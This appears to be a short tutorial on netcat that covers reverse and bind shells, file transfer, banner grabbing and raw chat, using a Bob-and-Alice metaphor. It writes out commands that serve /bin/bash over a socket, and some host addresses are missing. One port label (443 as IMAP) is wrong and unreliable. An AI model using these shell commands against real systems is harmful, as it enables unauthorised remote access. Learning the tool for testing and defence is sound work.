Netcat can read & write TCP/UDP ports. Here are a few different use-cases for it.

Reverse Shell

A Reverse Shell involves opening a port locally and then, getting a remote node to send you a shell. As a metaphor, imagine Bob has a mailbox (the port). Since he is interested in what is going on elsewhere, he gets Alice to give him a subscription to the city newspaper (a shell) where she lives. Instead of driving downtown and directly probing for information, Bob simply waits for the newspaper to show up.

By the way, for those who have not caught on yet (took me a while) the character of Alice is used to denote “point A” while Bob is used as “point B.” Therefore, one can infer a direction by following the normal convention of “point A to point B.”

In the following example, Bob has the IP address of

nc -lnvp 8888			# Bob; the mailbox
nc -nv -e /bin/bash # Alice; the newspaper
[ Intranet | Extranet ]
     {     |x----}	# Bob can't get a Bind Shell (inbound rules)
Alice{	   | 	 }Bob
     {~~~~~|~~~~>}	# So he uses a Reverse Shell (no proxy/outbound rules)  

Bind Shell

nc -lnvp 8888 -e /bin/bash # binds a shell to port 8888
nc -nv 8888	   # accesses port/shell on the remote node

File Transfer

Open a port, direct everything a file. Redirect file to recently opened port.

nc -lnvp 8888 > incoming.exe 	       		# do on system needing file
nc -nv 8888 < /path/to/file.exe 	# do on system with file

Banner Grabbing

Banner grabbing is a technique used to collect service version information from a remote node. For example, each command sentence below provokes verbose output from a target.

nc -nv 25  # SMTP
nc -nv 110 # POP3
nc -nv 443 # IMAP

Raw Chat

Output will be the same on both ends of the socket.

nc -lnvp 8888	   # server; his IP address =
nc -nv # client; connects to server